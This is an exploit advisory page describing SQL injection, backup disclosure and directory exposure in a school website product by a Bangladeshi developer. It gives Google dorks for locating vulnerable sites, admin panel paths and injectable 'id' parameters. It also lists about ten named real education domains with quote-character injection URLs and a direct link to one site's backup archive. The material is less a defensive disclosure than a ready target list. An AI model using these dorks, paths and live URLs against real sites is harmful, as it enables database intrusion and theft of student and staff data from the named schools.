RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure

2019.01.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################### # Exploit Title : RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 05/01/2019 # Vendor Homepage : redgreenbd.com # Vendor Version : PHP 5.4.45 - LiteSpeed Server - jQuery 1.3.2 # Software Download Link : N/A # Software : Priced => See Here => redgreenbd.com/pd.php # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Google Dorks : intext:''Design & Developed by : RedGreenBD IT Solutions'' intext:''Designed by RedGreenBD IT Solutions'' intext:''Developed by RedGreenBD ITS" # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-200: Information Exposure CWE-538: File and Directory Information Exposure # Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-redgreenbd-it-solutions-multiple-vulnerabilities.html ################################################################### # Admin Panel Login Path / Student-Teacher-Guardian Panel Path => *********************************************************** /index.php?q=login-form /?q=login /?q=student-login /wadmin # SQL Injection Exploit : ********************** /?q=newsDetail&id=[SQL Injection] /?q=news-detail&id=[SQL Injection] /?q=notice-detail&id=[SQL Injection] /?q=page-detail&id=[SQL Injection] /?q=home-block&id=[SQL Injection] /index.php?q=news-detail&id=[SQL Injection] # Backup Disclosure Exploit [ Example ] => *************************************** Look at this /uploads/ folder for backup files. /uploads/uploads_backup_[DAY]_[MONTH]_[YEAR].zip /uploads/uploads_backup_18_12_18.zip /uploads/uploads_backup_21_11_18.zip # Arbitrary File Disclosure => ************************** Look at this folder. /uploads/.... /uploads/booklist/ => PDF Files here /uploads/mnews/ => PDF Files here /uploads/result/ => PDF Files here /uploads/routine3/ => PDF Files here /uploads/syllabus/ => PDF Files here ################################################################### # Example Vulnerable Sites => Note => Bangladesh Education Sites are vulnerable for this security issue. (104.152.168.23) => There are 899 domains hosted on this server. [+] dhankhalimuss.edu.bd/?q=newsDetail&id=13%27 => + Proof of Concept for SQL Injection => archive.vn/EJDgW [+] cmpi.edu.bd/?q=newsDetail&id=13%27 [+] panchjuniadss.edu.bd/?q=newsDetail&id=13%27 [+] ths.edu.bd/?q=newsDetail&id=13%27 [+] rmss.edu.bd/?q=newsDetail&id=13%27 [+] pakhimarapvss.edu.bd/?q=notice-detail&id=3%27 [+] tsbghs.edu.bd/?q=page-detail&id=3%27 [+] nipi.edu.bd/?q=newsDetail&id=13%27 [+] cppi.edu.bd/?q=newsDetail&id=13%27 [+] bsidhaka.edu.bd/?q=newsDetail&id=13%27 [+] bsidhaka.edu.bd/uploads/uploads_backup_21_11_18.zip ################################################################### # SQL Database Error : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13''' at line 1 ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top